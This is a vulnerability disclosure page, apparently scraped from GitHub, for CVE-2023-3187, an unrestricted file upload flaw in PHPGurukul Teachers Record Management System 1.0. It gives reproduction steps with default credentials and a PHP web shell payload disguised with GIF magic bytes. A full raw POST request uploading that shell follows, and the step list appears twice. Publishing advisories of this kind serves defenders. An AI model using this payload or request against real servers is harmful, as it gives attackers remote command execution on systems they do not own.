Headline
CVE-2023-3187: Vulnerability/trms.md at main · ctflearner/Vulnerability
A vulnerability, which was classified as critical, has been found in PHPGurukul Teachers Record Management System 1.0. Affected by this issue is some unknown functionality of the file /changeimage.php of the component Profile Picture Handler. The manipulation of the argument newpic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231176.
Permalink
Cannot retrieve contributors at this time
TEACHER RECORD MANAGEMENT SYSTEM v1.0-POC****TITLE
- Teachers Record Management System 1.0 – File Upload Type Validation Error in /changeimage.php
DESCRIPTION
The upload functionality of updating user profile does not properly validate the file content-type, filename, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.
STEPS-TO-REPRODUCE
- Login into Teacher-Account with the credentials “Username: [email protected]” Password: Test@123”
- Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
- Open the Burp-suite and Intercept the Edit Image Request
- In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
- Change the **Content-type from “ image/png “ to “ image/jpg “
- And Add this **Payload** : `GIF89a <?php echo system($_REQUEST[‘dx’]); ?>`
- Where **GIF89a is the GIF magic bytes this bypass the file upload extension**
- Below is the Burpsuite-POST Request for all the changes that I have made above1. Login into Teacher-Account with the credentials “Username: [email protected] Password: Test@123”
- Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
- Open the Burp-suite and Intercept the Edit Image Request
- In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
- Change the Content-type from “ image/png “ to “ image/jpg “
- And Add this Payload : `GIF89a <?php echo system($_REQUEST[‘dx’]); ?>`
- Where GIF89a is the GIF magic bytes this bypass the file upload extension
- Below is the Burpsuite-POST Request for all the changes that I have made above
BURPSUITE_POST_REQUEST
POST /trms/teacher/changeimage.php HTTP/1.1 Host: localhost Content-Length: 442 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="109", “Not_A Brand";v="99” sec-ch-ua-mobile: ?0 sec-ch-ua-platform: “Windows” Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/trms/teacher/changeimage.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc Connection: close
------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="subjects"
John Doe ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif" Content-Type: image/gif
GIF89a <?php echo system($_REQUEST[‘dx’]); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="submit"
------WebKitFormBoundaryndAPYa0GGOxSUHdF–
PROOF_OF_CONCEPT
Related news
Teachers Record Management System version 1.0 suffers from file upload validation bypass vulnerability.